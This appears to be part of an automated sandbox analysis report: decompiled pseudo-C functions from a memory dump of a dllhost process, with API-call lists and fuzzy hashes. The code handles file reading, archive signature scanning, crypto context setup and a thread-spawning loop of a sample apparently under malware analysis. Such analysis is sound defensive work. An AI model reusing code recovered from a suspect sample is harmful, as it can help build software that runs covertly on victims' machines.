                                                															_v840 = 0x400;
                                                														} else {
                                                															goto L68;
                                                														}
                                                													}
                                                												}
                                                												L74:
                                                												FindCloseChangeNotification(_t175); // executed
                                                												E0286F2D0( *_t235, _t221);
                                                												__eflags = _v12 ^ _t258;
                                                												_pop(_t251);
                                                												return E02870A5D(_v12 ^ _t258, _t251);
                                                												goto L87;
                                                											}
                                                											_v840 = 0x1000;
                                                											goto L74;
                                                										} else {
                                                											_pop(_t252);
                                                											__eflags = _v12 ^ _t258;
                                                											return E02870A5D(_v12 ^ _t258, _t252);
                                                										}
                                                									}
                                                								} else {
                                                									__eflags = _t113 - 0x2f;
                                                									if(_t113 == 0x2f) {
                                                										L41:
                                                										_t206 = 0;
                                                										__eflags = 0;
                                                									} else {
                                                										__eflags = _t113 - 0x5c;
                                                										if(_t113 == 0x5c) {
                                                											goto L41;
                                                										} else {
                                                											__eflags = _t113;
                                                											if(_t113 == 0) {
                                                												L40:
                                                												_t206 =  &(_t235[0x50]);
                                                											} else {
                                                												__eflags =  *((char*)(_t172 + 1)) - 0x3a;
                                                												if( *((char*)(_t172 + 1)) == 0x3a) {
                                                													goto L41;
                                                												} else {
                                                													goto L40;
                                                												}
                                                											}
                                                										}
                                                									}
                                                									E0286FB00(_t206, _t172);
                                                									_pop(_t253);
                                                									__eflags = _v12 ^ _t258;
                                                									return E02870A5D(_v12 ^ _t258, _t253);
                                                								}
                                                							} else {
                                                								__eflags = _v12 ^ _t258;
                                                								return E02870A5D(_v12 ^ _t258, _t243);
                                                							}
                                                						} else {
                                                							 *((char*)(_t256 + _t234 - 0x20c)) = 0;
                                                							E0286FB00(_t243,  &_v528);
                                                							goto L12;
                                                						}
                                                					}
                                                				}
                                                				L87:
                                                			}


                                                APIs
                                                • GetFileAttributesA.KERNELBASE(00000000,?,02865104), ref: 0286FB1E
                                                • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0286FB2C
                                                • GetFileAttributesA.KERNEL32(00000000,?,?,02865104), ref: 0286FBDD
                                                • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0286FBF2
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: AttributesCreateDirectoryFile
                                                • String ID:
                                                • API String ID: 3401506121-0
                                                • Opcode ID: f0b08beca651bf3afabe2c1375cb00a44803686609865e35fe7b8bba42d278a9
                                                • Instruction ID: d93128d431f4dd86002a334ca7f7512915d6362bec9364f34319559b918d4012
                                                • Opcode Fuzzy Hash: f0b08beca651bf3afabe2c1375cb00a44803686609865e35fe7b8bba42d278a9
                                                • Instruction Fuzzy Hash: 17418E3D5002099FCF20CF3CA898BFDB766AF65310F500699D9AAD7681CB71D946CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 86%
                                                			E0286E0D0(CHAR* __ecx, long* _a8) {
                                                				void* _v8;
                                                				void* __esi;
                                                				void* _t12;
                                                				long _t13;
                                                				void* _t15;
                                                				long _t17;
                                                				signed int _t19;
                                                				signed int _t20;
                                                				long* _t24;
                                                				void* _t27;
                                                				char* _t28;
                                                
                                                				_push(__ecx);
                                                				_t24 = _a8;
                                                				 *_t24 = 0; // executed
                                                				_t12 = CreateFileA(__ecx, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                                                				_v8 = _t12;
                                                				if(_t12 != 0xffffffff) {
                                                					_push(_t19);
                                                					_push(_t27);
                                                					_t13 = SetFilePointer(_t12, 0, 0, 1); // executed
                                                					__eflags = _t13 - 0xffffffff;
                                                					_t20 = _t19 & 0xffffff00 | __eflags != 0x00000000;
                                                					_t28 = E02870A6E(_t27, __eflags, 0x20);
                                                					_t15 = _v8;
                                                					 *_t28 = 1;
                                                					 *((char*)(_t28 + 0x10)) = 1;
                                                					 *(_t28 + 1) = _t20;
                                                					 *(_t28 + 4) = _t15;
                                                					 *((char*)(_t28 + 8)) = 0;
                                                					 *(_t28 + 0xc) = 0;
                                                					__eflags = _t20;
                                                					if(_t20 != 0) {
                                                						_t17 = SetFilePointer(_t15, 0, 0, 1); // executed
                                                						 *(_t28 + 0xc) = _t17;
                                                					}
                                                					 *_t24 = 0;
                                                					return _t28;
                                                				} else {
                                                					 *_t24 = 0x200;
                                                					return 0;
                                                				}
                                                			}















                                                APIs
                                                • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000140,?,?,0286F440,00000141,FFFFFFFF,?,0286FFE1,?), ref: 0286E0F1
                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001,00000000,00000001,?,0286F440,00000141,FFFFFFFF,?,0286FFE1,?,?,00000244,E7FE870C), ref: 0286E115
                                                • new.LIBCMT ref: 0286E123
                                                • SetFilePointer.KERNELBASE(FFFFFFFF,00000000,00000000,00000001), ref: 0286E153
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: File$Pointer$Create
                                                • String ID:
                                                • API String ID: 250661774-0
                                                • Opcode ID: 625fa08a217afb5e9e9010887624c0259fb61ff5aad43fd38f3f9457f7a5bad5
                                                • Instruction ID: 1400f2bc7f65b56f44759a83f2863888007258bcaf617fed23bb853665a855f7
                                                • Opcode Fuzzy Hash: 625fa08a217afb5e9e9010887624c0259fb61ff5aad43fd38f3f9457f7a5bad5
                                                • Instruction Fuzzy Hash: 3D11C879684301BBF7308F68DC0AF56FBD89B01724F204649F658EB6C0D3F5A5508754
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0286B470() {
                                                				void* _v8;
                                                
                                                				 *0x2896a48 = 0;
                                                				L1:
                                                				if( *0x2896a48 < 0x40) {
                                                					_v8 = 0;
                                                					if(E0286B660( &_v8) != 1) {
                                                						CreateThread(0, 0, E0286B3C0, _v8, 0, 0); // executed
                                                						Sleep(0xa); // executed
                                                					} else {
                                                						Sleep(0x1e); // executed
                                                					}
                                                				} else {
                                                					Sleep(0x12c);
                                                				}
                                                				goto L1;
                                                			}





                                                APIs
                                                • Sleep.KERNEL32(0000012C), ref: 0286B49E
                                                • Sleep.KERNELBASE(0000001E), ref: 0286B4B8
                                                • CreateThread.KERNELBASE(00000000,00000000,0286B3C0,00000000,00000000,00000000), ref: 0286B4CC
                                                • Sleep.KERNELBASE(0000000A), ref: 0286B4D0
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: Sleep$CreateThread
                                                • String ID:
                                                • API String ID: 3220764680-0
                                                • Opcode ID: 2540b92d72069ceb8cead1db3b0b2eb5da768c903aaa674d38928f943c1c99e6
                                                • Instruction ID: 7070fcec198977504bc9fff617e336e727162ca06c9b6c28ba95a155c1933938
                                                • Opcode Fuzzy Hash: 2540b92d72069ceb8cead1db3b0b2eb5da768c903aaa674d38928f943c1c99e6
                                                • Instruction Fuzzy Hash: 97F0A73C9C031CFBE610AB94DC09F6DBBA8AF1571CF558414E205F66C097F46950DBA6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0286E170(char* __ecx, long __edx, LONG* _a4) {
                                                				LONG* _t13;
                                                				LONG* _t19;
                                                
                                                				if( *__ecx == 0) {
                                                					_t13 = _a4;
                                                					if(_t13 != 0) {
                                                						if(_t13 != 1) {
                                                							if(_t13 == 2) {
                                                								 *((intOrPtr*)(__ecx + 0x1c)) =  *((intOrPtr*)(__ecx + 0x18)) + __edx;
                                                							}
                                                							return 0;
                                                						} else {
                                                							 *((intOrPtr*)(__ecx + 0x1c)) =  *((intOrPtr*)(__ecx + 0x1c)) + __edx;
                                                							return 0;
                                                						}
                                                					} else {
                                                						 *((intOrPtr*)(__ecx + 0x1c)) = __edx;
                                                						return _t13;
                                                					}
                                                				} else {
                                                					if( *((char*)(__ecx + 1)) == 0) {
                                                						return 0x1d;
                                                					} else {
                                                						_t19 = _a4;
                                                						if(_t19 != 0) {
                                                							if(_t19 != 1) {
                                                								if(_t19 != 2) {
                                                									return 0x13;
                                                								} else {
                                                									SetFilePointer( *(__ecx + 4), __edx, 0, _t19); // executed
                                                									return 0;
                                                								}
                                                							} else {
                                                								SetFilePointer( *(__ecx + 4), __edx, 0, _t19);
                                                								return 0;
                                                							}
                                                						} else {
                                                							SetFilePointer( *(__ecx + 4),  *((intOrPtr*)(__ecx + 0xc)) + __edx, _t19, _t19); // executed
                                                							return 0;
                                                						}
                                                					}
                                                				}
                                                			}






                                                APIs
                                                • SetFilePointer.KERNELBASE(?,?,00000002,00000002,?,0286E3D2,00000002,00000001,?,?,?,0286E570,?,00000000,00000001), ref: 0286E190
                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000002,?,0286E3D2,00000002,00000001,?,?,?,0286E570,?,00000000,00000001), ref: 0286E1A6
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: e6232d9cd9527174c80827e4fb23c86dd252e640eedd86a8b60bf1fe7f4fd92a
                                                • Instruction ID: 753125bfe4c0b71a5b889be9b9ad27ea812198eeba3bec924de0dd910a3176f1
                                                • Opcode Fuzzy Hash: e6232d9cd9527174c80827e4fb23c86dd252e640eedd86a8b60bf1fe7f4fd92a
                                                • Instruction Fuzzy Hash: 0111217D6441046FEB28CF69EC45F363BDDEB85729F2888A9F40CC9551E323C852AB40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 92%
                                                			E0286E3C0(char* __ecx, void* __eflags) {
                                                				intOrPtr _v8;
                                                				intOrPtr _v12;
                                                				intOrPtr _v16;
                                                				signed int _v20;
                                                				long _v24;
                                                				long _v28;
                                                				intOrPtr _v32;
                                                				signed int _t46;
                                                				signed int _t48;
                                                				intOrPtr _t49;
                                                				long _t54;
                                                				struct _OVERLAPPED* _t55;
                                                				signed int _t58;
                                                				void* _t60;
                                                				intOrPtr _t61;
                                                				int _t63;
                                                				long _t65;
                                                				intOrPtr* _t67;
                                                				intOrPtr _t69;
                                                				intOrPtr _t78;
                                                				intOrPtr _t80;
                                                				intOrPtr _t84;
                                                				long _t87;
                                                				void* _t91;
                                                				void* _t94;
                                                				void* _t95;
                                                				void* _t96;
                                                
                                                				_t68 = __ecx;
                                                				_t67 = __ecx; // executed
                                                				_t46 = E0286E170(__ecx, 0, 2); // executed
                                                				_t95 = _t94 + 4;
                                                				if(_t46 == 0) {
                                                					if( *__ecx == 0) {
                                                						_t84 =  *((intOrPtr*)(__ecx + 0x1c));
                                                						goto L7;
                                                					} else {
                                                						if( *((char*)(__ecx + 1)) == 0) {
                                                							_t84 = 0;
                                                							_v16 = 0;
                                                							goto L8;
                                                						} else {
                                                							_t65 = SetFilePointer( *(__ecx + 4), 0, 0, 1); // executed
                                                							_t84 = _t65 -  *((intOrPtr*)(_t67 + 0xc));
                                                							L7:
                                                							_v16 = _t84;
                                                							_v12 = 0xffff;
                                                							if(_t84 < 0xffff) {
                                                								L8:
                                                								_v12 = _t84;
                                                							}
                                                						}
                                                					}
                                                					_push(0x404);
                                                					_t48 = E02875A3B(_t68);
                                                					_t91 = _t48;
                                                					_t96 = _t95 + 4;
                                                					if(_t91 != 0) {
                                                						_t69 = _v12;
                                                						_t49 = 4;
                                                						_v8 = 0xffffffff;
                                                						if(_t69 > 4) {
                                                							while(1) {
                                                								_t78 =  >  ? _t69 : _t49 + 0x400;
                                                								_t54 = _t84 - _t78;
                                                								_v32 = _t78;
                                                								_v28 = _t54;
                                                								_t87 =  >  ? 0x404 : _t84 - _t54;
                                                								_t55 = E0286E170(_t67, _t54, 0); // executed
                                                								_t96 = _t96 + 4;
                                                								if(_t55 != 0) {
                                                									goto L31;
                                                								}
                                                								_t72 = _t87;
                                                								_v20 = _t87;
                                                								if( *_t67 == _t55) {
                                                									_t80 =  *((intOrPtr*)(_t67 + 0x1c));
                                                									if(_t80 + _t87 >  *((intOrPtr*)(_t67 + 0x18))) {
                                                										_t72 =  *((intOrPtr*)(_t67 + 0x18)) - _t80;
                                                										_v20 =  *((intOrPtr*)(_t67 + 0x18)) - _t80;
                                                									}
                                                									E02883DB0(_t91,  *((intOrPtr*)(_t67 + 0x14)) + _t80, _t72);
                                                									_t58 = _v20;
                                                									_t96 = _t96 + 0xc;
                                                									 *((intOrPtr*)(_t67 + 0x1c)) =  *((intOrPtr*)(_t67 + 0x1c)) + _t58;
                                                								} else {
                                                									_t63 = ReadFile( *(_t67 + 4), _t91, _t87,  &_v24, _t55); // executed
                                                									if(_t63 == 0) {
                                                										 *((char*)(_t67 + 8)) = 1;
                                                									}
                                                									_t58 = _v24;
                                                								}
                                                								if(_t58 / _t87 == 1) {
                                                									_t60 = _t87 - 3;
                                                									if(_t60 < 0) {
                                                										L28:
                                                										_t61 = _v8;
                                                									} else {
                                                										while(1) {
                                                											_t60 = _t60 - 1;
                                                											if( *((char*)(_t60 + _t91)) == 0x50 &&  *((char*)(_t60 + _t91 + 1)) == 0x4b &&  *((char*)(_t60 + _t91 + 2)) == 5 &&  *((char*)(_t60 + _t91 + 3)) == 6) {
                                                												break;
                                                											}
                                                											if(_t60 >= 0) {
                                                												continue;
                                                											} else {
                                                												goto L28;
                                                											}
                                                											goto L29;
                                                										}
                                                										_t61 = _t60 + _v28;
                                                										_v8 = _t61;
                                                									}
                                                									L29:
                                                									if(_t61 == 0) {
                                                										_t69 = _v12;
                                                										_t49 = _v32;
                                                										_t84 = _v16;
                                                										if(_t49 < _t69) {
                                                											continue;
                                                										}
                                                									}
                                                								}
                                                								goto L31;
                                                							}
                                                						}
                                                						L31:
                                                						L02875A36(_t91);
                                                						return _v8;
                                                					} else {
                                                						return _t48 | 0xffffffff;
                                                					}
                                                				} else {
                                                					return _t46 | 0xffffffff;
                                                				}
                                                			}






























                                                0x0286e4e6
                                                0x0286e454
                                                0x0286e528
                                                0x0286e529
                                                0x0286e53a
                                                0x0286e433
                                                0x0286e43c
                                                0x0286e43c
                                                0x0286e3d9
                                                0x0286e3e0
                                                0x0286e3e0

                                                APIs
                                                  • Part of subcall function 0286E170: SetFilePointer.KERNELBASE(?,?,00000002,00000002,?,0286E3D2,00000002,00000001,?,?,?,0286E570,?,00000000,00000001), ref: 0286E190
                                                • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001,00000000,00000001,?,?,?,0286E570,?,00000000,00000001), ref: 0286E3F6
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: f23afccbe5b28d011fb419a756b7592f1be681996c8bb5400775578fdd9b85c8
                                                • Instruction ID: f3e616bcdee3a40fb248cc607780ffb7ae748bb8bf5d06a5990299beba49ae63
                                                • Opcode Fuzzy Hash: f23afccbe5b28d011fb419a756b7592f1be681996c8bb5400775578fdd9b85c8
                                                • Instruction Fuzzy Hash: 0241D2BCE002059BEF24CE79D889B7EBBA6AB84314F1481B9D909DB281E730D9518B51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 74%
                                                			E0286FF70(void* __eflags) {
                                                				intOrPtr _v8;
                                                				char _v16;
                                                				intOrPtr* _v20;
                                                				void* __ecx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t12;
                                                				intOrPtr _t16;
                                                				intOrPtr* _t17;
                                                				void* _t20;
                                                				intOrPtr* _t28;
                                                				signed int _t35;
                                                
                                                				_push(0xffffffff);
                                                				_push(E028847B2);
                                                				_push( *[fs:0x0]);
                                                				_push(_t20);
                                                				_t12 =  *0x288f008; // 0xe7fe870c
                                                				_push(_t12 ^ _t35);
                                                				 *[fs:0x0] =  &_v16;
                                                				_t32 = _t20;
                                                				_t28 = E02870A6E(_t20, __eflags, 0x244);
                                                				_v20 = _t28;
                                                				_push(_t20);
                                                				_t21 = _t28;
                                                				 *_t28 = 0;
                                                				 *((intOrPtr*)(_t28 + 4)) = 0xffffffff;
                                                				 *((intOrPtr*)(_t28 + 0x134)) = 0xffffffff;
                                                				 *((intOrPtr*)(_t28 + 0x138)) = 0;
                                                				 *((intOrPtr*)(_t28 + 0x13c)) = 0;
                                                				_v8 = 0xffffffff;
                                                				_t16 = E0286F3D0(_t28, _t28, _t32); // executed
                                                				 *0x2896a4c = _t16;
                                                				if(_t16 == 0) {
                                                					_t17 = E02870A6E(_t32, __eflags, 8);
                                                					 *_t17 = 1;
                                                					 *((intOrPtr*)(_t17 + 4)) = _t28;
                                                					 *[fs:0x0] = _v16;
                                                					return _t17;
                                                				} else {
                                                					E02870030(_t28, _t21);
                                                					 *[fs:0x0] = _v16;
                                                					return 0;
                                                				}
                                                			}
















                                                APIs
                                                • new.LIBCMT ref: 0286FF9C
                                                  • Part of subcall function 0286F3D0: GetCurrentDirectoryA.KERNEL32(00000104,00000140,00000000,?,00000000,?,0286FFE1,?,?,00000244,E7FE870C,?,?,?,E7FE870C,028847B2), ref: 0286F3F7
                                                • new.LIBCMT ref: 02870007
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: CurrentDirectory
                                                • String ID:
                                                • API String ID: 1611563598-0
                                                • Opcode ID: 45f91a2eb7c8c01c6d45e70b23e527cf63bd18dc0b4989a6a6cf8a4e90da5780
                                                • Instruction ID: 5c54d601d5eef6eef8204c074343bcd3f80e124a3dc54dcd260da28e7c735af1
                                                • Opcode Fuzzy Hash: 45f91a2eb7c8c01c6d45e70b23e527cf63bd18dc0b4989a6a6cf8a4e90da5780
                                                • Instruction Fuzzy Hash: 8B11C1BAA04605AFD314DF1DD805BAAF7E9FB41730F00432AE429C77C0EBB5A4108B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E02877848(void* _a4) {
                                                				char _t3;
                                                				intOrPtr* _t4;
                                                				intOrPtr _t6;
                                                
                                                				if(_a4 != 0) {
                                                					_t3 = RtlFreeHeap( *0x28967f4, 0, _a4); // executed
                                                					if(_t3 == 0) {
                                                						_t4 = E02875D43();
                                                						_t6 = E02875CCA(GetLastError());
                                                						 *_t4 = _t6;
                                                						return _t6;
                                                					}
                                                				}
                                                				return _t3;
                                                			}







                                                APIs
                                                • RtlFreeHeap.NTDLL(00000000,00000000,?,0287C333,?,00000000,?,00000000,?,0287C35A,?,00000007,?,?,0287C757,?), ref: 0287785E
                                                • GetLastError.KERNEL32(?,?,0287C333,?,00000000,?,00000000,?,0287C35A,?,00000007,?,?,0287C757,?,?), ref: 02877870
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 485612231-0
                                                • Opcode ID: b18b924e1c7c696594c229003c087083d0823a5c37c091be9ea5fd9039a48d0f
                                                • Instruction ID: da1ced1c5671e03e14698b1c6a292c1705dbd6fec1c74d3d5d17624c140a2595
                                                • Opcode Fuzzy Hash: b18b924e1c7c696594c229003c087083d0823a5c37c091be9ea5fd9039a48d0f
                                                • Instruction Fuzzy Hash: 76E0CD3D440204A7DB142FA8EC0CB597BD9DF40354F540434F94CD9190DB78D490CBC8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 37%
                                                			E028648B0(intOrPtr* __ecx) {
                                                				void* _t8;
                                                				void* _t11;
                                                				void* _t18;
                                                				intOrPtr* _t19;
                                                
                                                				_t19 = __ecx;
                                                				_t15 =  *((intOrPtr*)( *__ecx + 0xc)) + 0x50;
                                                				_t8 = LocalAlloc(0x40,  *((intOrPtr*)( *__ecx + 0xc)) + 0x50);
                                                				_t20 =  *_t19;
                                                				_t18 = _t8;
                                                				asm("movups xmm0, [esi]");
                                                				_t2 = _t18 + 0x50; // 0x50
                                                				asm("movups [edi], xmm0");
                                                				asm("movups xmm0, [esi+0x10]");
                                                				asm("movups [edi+0x10], xmm0");
                                                				asm("movups xmm0, [esi+0x20]");
                                                				asm("movups [edi+0x20], xmm0");
                                                				asm("movups xmm0, [esi+0x30]");
                                                				asm("movups [edi+0x30], xmm0");
                                                				asm("movups xmm0, [esi+0x40]");
                                                				asm("movups [edi+0x40], xmm0");
                                                				E02883DB0(_t2,  *((intOrPtr*)( *_t19 + 0x50)),  *((intOrPtr*)( *_t19 + 0xc)));
                                                				_t11 = E02864920(_t18, _t15,  *((intOrPtr*)(_t20 + 0x54)),  *((intOrPtr*)(_t20 + 0x38))); // executed
                                                				LocalFree(_t18); // executed
                                                				return _t11;
                                                			}








                                                APIs
                                                • LocalAlloc.KERNEL32(00000040,?,?,00000000,-00000050,02864BCD), ref: 028648C0
                                                  • Part of subcall function 02864920: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000050,?,?), ref: 02864935
                                                • LocalFree.KERNELBASE(00000000), ref: 02864912
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: Local$AcquireAllocContextCryptFree
                                                • String ID:
                                                • API String ID: 3426805970-0
                                                • Opcode ID: a75c4a5767216db177071c57487dc9ea0a519df9f6683bacdecf472a73b8f1c8
                                                • Instruction ID: c822feed435d475f7ef18ed81ff82d2ad25c99b3d3136c57ad99173396d960b5
                                                • Opcode Fuzzy Hash: a75c4a5767216db177071c57487dc9ea0a519df9f6683bacdecf472a73b8f1c8
                                                • Instruction Fuzzy Hash: 29018035D00B45ABD3118F38C9419B2F3B4FF6D318705AB09EAC562912E761B5E48750
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0286E280(char* __ecx, long __edx) {
                                                				void _v5;
                                                				long _v12;
                                                				signed int _t22;
                                                				signed int* _t28;
                                                				intOrPtr _t29;
                                                				intOrPtr _t31;
                                                				char* _t35;
                                                
                                                				_t35 = __ecx;
                                                				_t28 = __edx;
                                                				_v12 = __edx;
                                                				_t33 = 1;
                                                				if( *__ecx == 0) {
                                                					_t29 =  *((intOrPtr*)(__ecx + 0x1c));
                                                					_t31 =  *((intOrPtr*)(__ecx + 0x18));
                                                					if(_t29 + 1 > _t31) {
                                                						_t33 = _t31 - _t29;
                                                					}
                                                					E02883DB0( &_v5,  *((intOrPtr*)(_t35 + 0x14)) + _t29, _t33);
                                                					_t22 = _t29 + _t33;
                                                					_t28 = _v12;
                                                					 *(_t35 + 0x1c) = _t22;
                                                				} else {
                                                					_t22 = ReadFile( *(__ecx + 4),  &_v5, 1,  &_v12, 0); // executed
                                                					if(_t22 == 0) {
                                                						 *((char*)(_t35 + 8)) = 1;
                                                					}
                                                					_t33 = _v12;
                                                				}
                                                				if(_t33 != 1) {
                                                					if( *_t35 == 0 ||  *((char*)(_t35 + 8)) == 0) {
                                                						goto L9;
                                                					} else {
                                                						return _t22 | 0xffffffff;
                                                					}
                                                				} else {
                                                					 *_t28 = _v5 & 0x000000ff;
                                                					L9:
                                                					return 0;
                                                				}
                                                			}











                                                APIs
                                                • ReadFile.KERNELBASE(?,?,00000001,00000000,00000000,00000000,00000000,00000001,00000000,00000001,?,?,0286E59A,00000001), ref: 0286E2A8
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: dad481767f9a12f946a632b51bb81e63fbfb27eb821585f3f5cbb16e205f1fd4
                                                • Instruction ID: 12ab616add598aa6b09a87e3a5f0ad3c29137f9cde3df8993497c8256128497f
                                                • Opcode Fuzzy Hash: dad481767f9a12f946a632b51bb81e63fbfb27eb821585f3f5cbb16e205f1fd4
                                                • Instruction Fuzzy Hash: AC11B97DA042086FD720CE99D884FA9B7FDAB45314F0405AAE849C7341E771A948C761
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 95%
                                                			E0286F3D0(intOrPtr* __ecx, void* __edi, CHAR* _a4) {
                                                				char _v8;
                                                				char _t13;
                                                				intOrPtr _t14;
                                                				void* _t16;
                                                				intOrPtr _t17;
                                                				intOrPtr _t20;
                                                				short _t21;
                                                				CHAR* _t23;
                                                				char* _t29;
                                                				CHAR* _t32;
                                                				short* _t34;
                                                				intOrPtr* _t36;
                                                
                                                				_push(__ecx);
                                                				_t36 = __ecx;
                                                				if( *__ecx != 0 ||  *((intOrPtr*)(__ecx + 4)) != 0xffffffff) {
                                                					return 0x1000000;
                                                				} else {
                                                					_t2 = _t36 + 0x140; // 0x140
                                                					_t32 = _t2;
                                                					GetCurrentDirectoryA(0x104, _t32);
                                                					_t23 = _t32;
                                                					_t3 =  &(_t23[1]); // 0x141
                                                					_t29 = _t3;
                                                					do {
                                                						_t13 =  *_t23;
                                                						_t23 =  &(_t23[1]);
                                                					} while (_t13 != 0);
                                                					_t24 = _t23 - _t29;
                                                					_t14 =  *((intOrPtr*)(_t23 - _t29 + _t36 + 0x13f));
                                                					if(_t14 != 0x5c && _t14 != 0x2f) {
                                                						_t34 = _t32 - 1;
                                                						do {
                                                							_t20 =  *((intOrPtr*)(_t34 + 1));
                                                							_t34 = _t34 + 1;
                                                						} while (_t20 != 0);
                                                						_t21 = "\\"; // 0x5c
                                                						 *_t34 = _t21;
                                                					}
                                                					_t16 = E0286E0D0(_a4, _t24,  &_v8); // executed
                                                					if(_t16 != 0) {
                                                						_t17 = E0286E550(_t16); // executed
                                                						 *_t36 = _t17;
                                                						_t28 =  ==  ? 0x200 : 0;
                                                						_t18 =  ==  ? 0x200 : 0;
                                                						return  ==  ? 0x200 : 0;
                                                					} else {
                                                						return _v8;
                                                					}
                                                				}
                                                			}
















                                                APIs
                                                • GetCurrentDirectoryA.KERNEL32(00000104,00000140,00000000,?,00000000,?,0286FFE1,?,?,00000244,E7FE870C,?,?,?,E7FE870C,028847B2), ref: 0286F3F7
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: CurrentDirectory
                                                • String ID:
                                                • API String ID: 1611563598-0
                                                • Opcode ID: 94d98a3f7aaae801e6fadc44107af39bc699365e51a3e23c40b5c01fdddf8a6b
                                                • Instruction ID: 96354e709fbfb5996ff1aaffcecc5de3269e9e787b22f4fb9fa4b3a3a3ac7cd0
                                                • Opcode Fuzzy Hash: 94d98a3f7aaae801e6fadc44107af39bc699365e51a3e23c40b5c01fdddf8a6b
                                                • Instruction Fuzzy Hash: 97112B3E5042059ACB248F2CB808BF5B795FF99314F00826EE99DC7E40E732A9538790
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 93%
                                                			E0286E550(char* __ecx) {
                                                				intOrPtr _v8;
                                                				char _v96;
                                                				char _v100;
                                                				intOrPtr _v104;
                                                				intOrPtr _v120;
                                                				intOrPtr _v124;
                                                				intOrPtr _v128;
                                                				void _v132;
                                                				long _v136;
                                                				void* _v140;
                                                				signed int _v144;
                                                				signed int _v148;
                                                				signed int _v152;
                                                				long _t58;
                                                				void* _t59;
                                                				char _t61;
                                                				char _t62;
                                                				char _t63;
                                                				void* _t67;
                                                				void* _t68;
                                                				char _t70;
                                                				intOrPtr _t76;
                                                				signed int _t87;
                                                				signed int _t89;
                                                				intOrPtr _t90;
                                                				signed int _t92;
                                                				intOrPtr _t93;
                                                				void* _t94;
                                                				signed int _t101;
                                                				char _t112;
                                                				intOrPtr _t136;
                                                				void _t146;
                                                				void* _t157;
                                                				void* _t158;
                                                				intOrPtr _t160;
                                                
                                                				_push(_t87);
                                                				_t146 = __ecx;
                                                				_t170 = __ecx;
                                                				if(__ecx == 0) {
                                                					L31:
                                                					__eflags = 0;
                                                					return 0;
                                                				} else {
                                                					_t58 = E0286E3C0(__ecx, _t170); // executed
                                                					_t89 = _t87 | 0xffffffff;
                                                					_v136 = _t58;
                                                					_t155 =  ==  ? _t89 : 0; // executed
